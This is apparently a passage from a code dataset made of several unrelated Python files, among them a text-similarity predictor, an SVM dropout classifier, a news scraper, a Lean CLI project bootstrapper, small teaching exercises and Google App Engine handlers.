'b_initializer':'zeros',\n 'dropout_rate':0.2,\n 'mlp_activation_func':'relu',\n 'mlp_num_layers':1,\n 'mlp_num_units':256,\n 'mlp_num_fan_out':128,\n 'input_shapes':[(48,),(48,),(48,),(48,)],\n 'task':'Classification',\n 'lstm_units':64,\n 'num_blocks':1,\n 'word_max_features':7300,\n 'word_embed_size':100\n }\n\n org_text_path = sys.argv[1]\n org_change_path = sys.argv[2]\n ans_text_path = sys.argv[3]\n org_text = open(org_text_path, \"r\", encoding='utf-8')\n org = org_text.read()\n org_change = open(org_change_path, \"r\", encoding='utf-8')\n change = org_change.read()\n with open('zhanghong.csv', \"w\", encoding='gbk') as work_path:\n header = ['org', 'org_change', 'similarity']\n writer = csv.DictWriter(work_path, fieldnames=header)\n writer.writeheader()\n writer.writerow({'org': org, 'org_change': change, 'similarity': 1})\n\n word_embedding_matrix = load_word_embed(base_params['word_max_features'], base_params['word_embed_size'])\n char_embedding_matrix = load_char_embed(base_params['max_features'], base_params['embed_size'])\n\n base_params['embedding_matrix'] = char_embedding_matrix\n base_params['word_embedding_matrix'] = word_embedding_matrix\n\n backend = DRCN(base_params)\n\n p_c_index_test, h_c_index_test, p_w_index_test, h_w_index_test, same_word_test, _ = load_all_data(\n 'zhanghong.csv', maxlen=base_params['input_shapes'][0][0])\n x_test = [p_c_index_test, h_c_index_test, p_w_index_test, h_w_index_test]\n\n model = backend.build()\n\n model.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n )\n\n best_model_filepath = 'best_drcn_model.h5'\n\n model.load_weights(best_model_filepath)\n\n end = model.predict(\n x=x_test,\n )\n\n print(end[0][1])\n\n with open(ans_text_path, \"w\") as ans_text:\n if len(change) == 0:\n ans_text.write(str(0))\n else:\n ans_text.write(str(end[0][1]))\n\nif __name__ == '__main__':\n\n yuce()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82368600","text":"rq = 
input()\r\n\r\nfinal_quit = []\r\ntmp_tex = []\r\ntmp_number = []\r\ni = 0\r\nresult_text = ''\r\n\r\nwhile i < len(rq):\r\n if not rq[i].isdigit():\r\n if not rq[i + 1].isdigit():\r\n tmp_tex.append(rq[i])\r\n else:\r\n tmp_tex.append(rq[i])\r\n final_quit.append(''.join(tmp_tex).upper())\r\n tmp_tex = []\r\n elif rq[i].isdigit():\r\n if i + 1 < len(rq):\r\n if not rq[i + 1].isdigit():\r\n tmp_number.append(rq[i])\r\n final_quit.append(int(''.join(tmp_number)))\r\n tmp_number = []\r\n else:\r\n tmp_number.append(rq[i])\r\n else:\r\n tmp_number.append(rq[i])\r\n final_quit.append(int(''.join(tmp_number)))\r\n i += 1\r\n\r\n# print(final_quit)\r\n\r\nfor i in range(0, len(final_quit), 2):\r\n result_text += final_quit[i] * final_quit[i + 1]\r\nprint(f'Unique symbols used: {len(set(result_text))}')\r\nprint(result_text)","sub_path":"PyCharm_projects_2020/Fundamentals/text_processing/rage_quit.py","file_name":"rage_quit.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421837699","text":"import pandas as pd\n# import datetime\n# import csv\n# f1 = open('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/video_load.csv', 'r')\n# data = f1.readlines()\n# f1o = open('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/video_load_o.csv', 'wb')\n# wr = csv.writer(f1o, quoting=csv.QUOTE_ALL)\n# wr.writerow(\n# ['module_id', 'module_video_number', 'user_id', 'view_number', 'video_number', 'session_number', 'only_load_video',\n# 'only_load_view', 'straight_through', 'start_stop_num', 'skip_ahead_num', 'backward_num', 'slow_rate_num',\n# 'time_use', 'finish_video_num', 'start', 'end', 'duration'])\n# for i in range(1, len(data)):\n# temp = data[i].strip().split(',')\n# temp.append((datetime.datetime.strptime(temp[16], \"%Y-%m-%d %H:%M:%S\") - datetime.datetime.strptime(temp[15], \"%Y-%m-%d %H:%M:%S\")).total_seconds())\n# wr.writerow(temp)\n\ndf_video = pd.read_csv('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/video_load_o.csv')\ndf_label = pd.read_csv('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/label.csv')\nnew4 = pd.merge(df_video, df_label[['user_id', 'max_module_load']], on=['user_id'])\n\ndef fxy(x, y):\n if int(x[2]) >= y: # 1 means drop: this module is the last one the user loaded\n return 1\n return 0 # 0 means the user continued past this module\n\nnew4['label'] = new4.apply(lambda x: fxy(x['module_id'], x['max_module_load']), axis=1)\n\n# TODO: calculate and normalize features\nnew4_middle1 = new4.drop(new4[(new4.module_id == 'M05')].index)\n\nnon_student_id = [\n 0,\n 4449592,\n 4449592,\n 2361192,\n 2879433,\n 4556057,\n 4556369,\n 4532336,\n 5826408,\n 8421136,\n 6617725,\n 3988563]\n\nfor i in non_student_id:\n new4_middle1 = new4_middle1.drop(new4_middle1[(new4_middle1.user_id == i)].index)\n\n# # Drop Mode 1: delete users who only watched module1 section1 video\nnew4_middle1.groupby(['user_id'],as_index = False).sum()\n# only_section1_id = []\n# for j in only_section1_id:\n# new4_middle1 = new4_middle1.drop(new4_middle1[(new4_middle1.user_id == j)].index)\n# # Drop Mode 2: delete users whose total watched video is fewer than certain threshold\n# fewer_video_id = []\n# for k in fewer_video_id:\n# new4_middle1 = new4_middle1.drop(new4_middle1[(new4_middle1.user_id == k)].index)\n\nnew4_middle1['avg_view_number_video'] = new4_middle1['view_number']/new4_middle1['video_number']\nnew4_middle1['avg_video'] = new4_middle1['video_number']/new4_middle1['module_video_number']\nnew4_middle1['avg_view_number_session'] = new4_middle1['view_number']/new4_middle1['session_number']\nnew4_middle1['avg_only_load_video'] = 
new4_middle1['only_load_video']/new4_middle1['video_number']\nnew4_middle1['avg_only_load_view'] = new4_middle1['only_load_view']/new4_middle1['view_number']\nnew4_middle1['avg_straight_through'] = new4_middle1['straight_through']/new4_middle1['video_number']\nnew4_middle1['avg_start_stop_num'] = new4_middle1['start_stop_num']/new4_middle1['video_number']\nnew4_middle1['avg_skip_ahead_num'] = new4_middle1['skip_ahead_num']/new4_middle1['video_number']\nnew4_middle1['avg_backward_num'] = new4_middle1['backward_num']/new4_middle1['video_number']\nnew4_middle1['avg_slow_rate_num'] = new4_middle1['slow_rate_num']/new4_middle1['video_number']\nnew4_middle1['avg_time_use'] = new4_middle1['time_use']/new4_middle1['video_number']\nnew4_middle1['opened_finish_video_num'] = new4_middle1['finish_video_num']/new4_middle1['video_number']\nnew4_middle1['all_finish_video_num'] = new4_middle1['finish_video_num']/new4_middle1['module_video_number']\n\nfeature = new4_middle1[['avg_view_number_video', 'avg_video', 'avg_view_number_session', 'avg_only_load_video', 'avg_only_load_view', 'avg_straight_through', 'avg_start_stop_num', 'avg_skip_ahead_num', 'avg_backward_num', 'avg_slow_rate_num', 'avg_time_use', 'opened_finish_video_num', 'all_finish_video_num', 'duration']]\nlabel = new4_middle1[['label']]\n\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\n\nlist_mat = feature.fillna(0).values.tolist()\nemnlp_mat = np.array(list_mat)\nlist_label = label['label'].tolist()\nemnlp_label = np.array(list_label)\n\n# from sklearn import preprocessing\n# X_train, X_test, Y_train, Y_test = train_test_split(emnlp_mat, emnlp_label, test_size=0.2, random_state=0)\n# X_train_scaled = preprocessing.scale(X_train)\n# X_test_scaled = preprocessing.scale(X_test)\n# clf = svm.SVC(kernel='linear', C=1).fit(X_train_scaled, Y_train)\n# clf.score(X_test_scaled, Y_test)\n# # print('done modelling')\n# print(clf.score(X_test_scaled, Y_test))\n\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler(copy=True, feature_range=(0, 1))\nX_minmax = min_max_scaler.fit_transform(emnlp_mat)\n\n# TODO: feature selection\n# from sklearn.feature_selection import VarianceThreshold\n# sel = VarianceThreshold(threshold=(.8 * (1 - .8)))\n# sel.fit_transform(X_train_scaled)\n\n# 5-fold cross validation\nfrom sklearn.model_selection import cross_val_score\nclf = svm.SVC(kernel='linear', C=1)\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score\naccuracy = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(accuracy_score))\nprecision = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(precision_score))\nrecall = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(recall_score))\nf1 = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(f1_score))\nprint('Accuracy', accuracy)\nprint('Precision', precision)\nprint('Recall', recall)\nprint('F1 score', f1)\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115564359","text":"import requests\nfrom bs4 import BeautifulSoup\n\nimport sys\nsys.path.append('..')\nfrom SendMsg import SendMsg\nimport os\n\nurl = 'https://www.fmprc.gov.cn/web/wjbxw_673019'\n\n# print(sys.path)\nprint(123123, os.path.abspath('.'))\n\n\ndef get_news():\n res = requests.get(url)\n res.encoding = 'UTF-8'\n 
return res\n\n\ndef getLatestNews():\n res = get_news()\n soup = BeautifulSoup(res.text, 'lxml')\n first_parent = soup.find_all('div', class_='imbox_ul')[0]\n latest_news_title = first_parent.li.text\n latest_news_link = url + first_parent.a.attrs['href'][1:]\n return latest_news_title, latest_news_link\n\n\ndef read_txt():\n content = []\n with open('data.txt', 'r', encoding='utf-8') as f:\n content.append(f.read())\n if len(content) > 0:\n return content[0]\n else:\n return ''\n\n\ndef write_txt(content): # how to solve the path problem?\n with open('data.txt', 'w', encoding='utf-8') as f:\n # print('content: ', f.read())\n f.write(content)\n\n\ndef job_fmn():\n previous_value = read_txt()\n latest_name, latest_link = getLatestNews()\n\n if latest_name != previous_value:\n sendMsg = SendMsg()\n sendMsg.create_news(site_name='外交部', site_link='https://www.fmprc.gov.cn/web/wjbxw_673019/', title=latest_name, news_link=latest_link)\n sendMsg.send()\n write_txt(latest_name)\n else:\n print('There is no latest news')\n\nif __name__ == '__main__':\n job_fmn()\n # print(read_txt())","sub_path":"foreign_ministry_news/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2412126","text":"from oscar.apps.catalogue.search_handlers import SimpleProductSearchHandler as CoreSimpleProductSearchHandler\nfrom apps.catalogue.models import Product\n\n\nclass SimpleProductSearchHandler(CoreSimpleProductSearchHandler):\n def get_queryset(self):\n qs = Product.browsable.base_queryset().filter(display=True)\n if self.categories:\n qs = qs.filter(categories__in=self.categories).distinct()\n return qs","sub_path":"apps/catalogue/search_handlers.py","file_name":"search_handlers.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334632887","text":"import shutil\nimport tempfile\nimport zipfile\nfrom pathlib import Path\n\nimport click\nimport requests\n\nfrom lean.click import LeanCommand\nfrom lean.config import Config\nfrom lean.container import container\n\nCSPROJ = \"\"\"\n<Project Sdk=\"Microsoft.NET.Sdk\">\n <PropertyGroup>\n <OutputType>Exe</OutputType>\n <TargetFramework>net5.0</TargetFramework>\n </PropertyGroup>\n <ItemGroup>\n <PackageReference Include=\"QuantConnect.Lean\" Version=\"2.5.*\"/>\n </ItemGroup>\n</Project>\n\"\"\"\n\nIDEA_WORKSPACE_XML = \"\"\"\n\n\n \n \n \n \n \n \n \n \n\n\"\"\"\n\nVSCODE_LAUNCH_JSON = \"\"\"\n{\n \"version\": \"0.2.0\",\n \"configurations\": [\n {\n \"name\": \"Debug Python with Lean CLI\",\n \"type\": \"python\",\n \"request\": \"attach\",\n \"connect\": {\n \"host\": \"localhost\",\n \"port\": 5678\n },\n \"pathMappings\": [\n {\n \"localRoot\": \"${fileDirname}\",\n \"remoteRoot\": \"/Project\"\n }\n ]\n },\n {\n \"name\": \"Debug C# with Lean CLI\",\n \"request\": \"attach\",\n \"type\": \"mono\",\n \"address\": \"localhost\",\n \"port\": 55555\n }\n ]\n}\n\"\"\"\n\n\n@click.command(cls=LeanCommand)\ndef init() -> None:\n \"\"\"Bootstrap a Lean CLI project.\"\"\"\n current_dir = Path.cwd()\n data_dir = current_dir / Config.default_data_directory_name\n lean_config_path = current_dir / Config.default_lean_config_file_name\n\n # Abort if one of the files we are going to create already exists to prevent us from overriding existing files\n for path in [data_dir, lean_config_path]:\n if path.exists():\n relative_path = path.relative_to(current_dir)\n raise RuntimeError(f\"{relative_path} already exists, please run this command in an empty directory\")\n\n logger = container.logger()\n\n # Warn the user if the current directory is not empty\n if next(current_dir.iterdir(), None) is not None:\n 
logger.info(\"This command will bootstrap a Lean CLI project in the current directory\")\n click.confirm(\"The current directory is not empty, continue?\", default=False, abort=True)\n\n # Download the Lean repository\n logger.info(\"Downloading latest sample data from the Lean repository...\")\n tmp_directory = Path(tempfile.mkdtemp())\n\n # We download the entire Lean repository and extract the data and the launcher's config file\n # GitHub doesn't allow downloading a specific directory\n # Since we need ~80% of the total repository in terms of file size this shouldn't be too big of a problem\n with requests.get(\"https://github.com/QuantConnect/Lean/archive/master.zip\", stream=True) as response:\n response.raise_for_status()\n\n with (tmp_directory / \"master.zip\").open(\"wb\") as file:\n for chunk in response.iter_content(chunk_size=8192):\n file.write(chunk)\n\n # Extract the downloaded repository\n with zipfile.ZipFile(tmp_directory / \"master.zip\") as zip_file:\n zip_file.extractall(tmp_directory / \"master\")\n\n # Copy the data directory\n shutil.copytree(tmp_directory / \"master\" / \"Lean-master\" / \"Data\", data_dir)\n\n # Create the config file\n lean_config_manager = container.lean_config_manager()\n config = (tmp_directory / \"master\" / \"Lean-master\" / \"Launcher\" / \"config.json\").read_text()\n config = lean_config_manager.clean_lean_config(config)\n\n # Update the data-folder configuration\n config = config.replace('\"data-folder\": \"../../../Data/\"', f'\"data-folder\": \"{Config.default_data_directory_name}\"')\n\n with lean_config_path.open(\"w+\") as file:\n file.write(config)\n\n # Create files which make debugging and autocompletion possible\n extra_files = {\n \"LeanCLI.csproj\": CSPROJ,\n \".idea/workspace.xml\": IDEA_WORKSPACE_XML,\n \".vscode/launch.json\": VSCODE_LAUNCH_JSON\n }\n\n for location, content in extra_files.items():\n path = Path(Path.cwd() / location)\n path.parent.mkdir(parents=True, exist_ok=True)\n with path.open(\"w+\") as file:\n file.write(content)\n\n # Prompt for some general configuration if not set yet\n cli_config_manager = container.cli_config_manager()\n if cli_config_manager.default_language.get_value() is None:\n default_language = click.prompt(\"What should the default language for new projects be?\",\n type=click.Choice(cli_config_manager.default_language.allowed_values))\n cli_config_manager.default_language.set_value(default_language)\n\n logger.info(f\"\"\"\nSuccessfully bootstrapped your Lean CLI project!\n\nThe following structure has been created:\n- {Config.default_lean_config_file_name} contains the configuration used when running the LEAN engine locally\n- {Config.default_data_directory_name}/ contains the data that is used when running the LEAN engine locally\n\nHere are some commands to get you going:\n- Run `lean create-project \"My Project\"` to create a new project with starter code\n- Run `lean backtest \"My Project\"` to backtest a project locally with the data in {Config.default_data_directory_name}/\n\"\"\".strip())\n","sub_path":"lean/commands/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"651718514","text":"from pythonds.basic.queue import Queue\n\ndef hotPotato(listOfNames, number):\n gameCircle = Queue()\n #add all people in list to a queue\n for person in listOfNames:\n gameCircle.enqueue(person)\n while gameCircle.size() > 1:\n #rotate the circle: move the person at the front of the queue to the back, number times, 
then remove the person who ends up at the front. Repeat until only one person remains.\n for i in range(number):\n gameCircle.enqueue(gameCircle.dequeue())\n gameCircle.dequeue()\n print(gameCircle)\n return gameCircle.dequeue()\n\nprint(hotPotato([\"Bill\", \"David\", \"Susan\", \"Jane\", \"Kent\", \"brad\"], 7))\n","sub_path":"interactivePython/hotPotato.py","file_name":"hotPotato.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77140997","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndataset = pd.read_csv('Data_age_salary.csv')\nX = dataset.iloc[:,:1].values\nprint(X)\nY = dataset.iloc[:,1].values\nprint(Y)\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,Y_train,Y_test = train_test_split(X, Y, test_size=1/4, random_state=0)\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor = regressor.fit(X_train,Y_train)\n\nY_predict = regressor.predict(X_test)\n\nplt.scatter(X_test, Y_test, color=\"red\", label=\"test data\")\nplt.plot(X_test, Y_predict, color=\"blue\", label=\"test prediction\")\n\nplt.scatter(X_train, Y_train, color=\"red\", label=\"training data\")\nplt.plot(X_train, regressor.predict(X_train), color=\"blue\", label=\"regression line\")\n\nplt.title('Linear Regression')\nplt.xlabel('Age')\nplt.ylabel('Salary')\nplt.legend()\nplt.show()","sub_path":"Code/my/LinerTest.py","file_name":"LinerTest.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413419396","text":"import loader\nimport scraper\nfrom typing import Callable, Dict\n\ndef _show_all():\n \"\"\"\n show all influencers in local influencers.JSON\n \"\"\"\n gen = loader.local.getlist()\n for i in gen:\n print(i.get('name',{}))\n print(i.get('ig',{}))\n\ndef _err():\n \"\"\"\n error function called if the operation passed is missing\n \"\"\"\n print('operation not available')\n\ndef _exit():\n \"\"\"\n close the CLI\n \"\"\"\n exit()\n\ndef _help():\n \"\"\"\n print available commands\n \"\"\"\n print(\"Commands list: \\n\\n\")\n for valid_op in op_list:\n print('\\u25A2 ', f'{valid_op}:\\n{op_list[valid_op].__doc__}')\n\n\nop_list: Dict[str, Callable] = {\n 'show_all': _show_all,\n 'exit': _exit,\n 'help': _help\n}","sub_path":"op/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344465626","text":"# -*- coding: utf-8 -*-\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom twitdobau.models import UserPrefs\nfrom twitdobau.handlers.base import BaseHandler\n\nclass MenuHandler(BaseHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n options = (\"Bem Vindo, %s! <a href=\\\"%s\\\">(logout)</a>\" %\n (user.nickname(), users.create_logout_url(\"/\")))\n else:\n options = (\"<a href=\\\"%s\\\">Logar.</a>\" %\n users.create_login_url(\"/intl/pt-BR/\"))\n\n self.render('default/menu.html', {\n 'options': options\n })\n\nclass ProfilePage(BaseHandler):\n def get(self):\n user = users.get_current_user()\n userPrefs = UserPrefs.all().filter('user', user.user_id()).get()\n self.render('user/profile.html', {\n 'user': userPrefs\n })\n return","sub_path":"src/twitdobau/handlers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}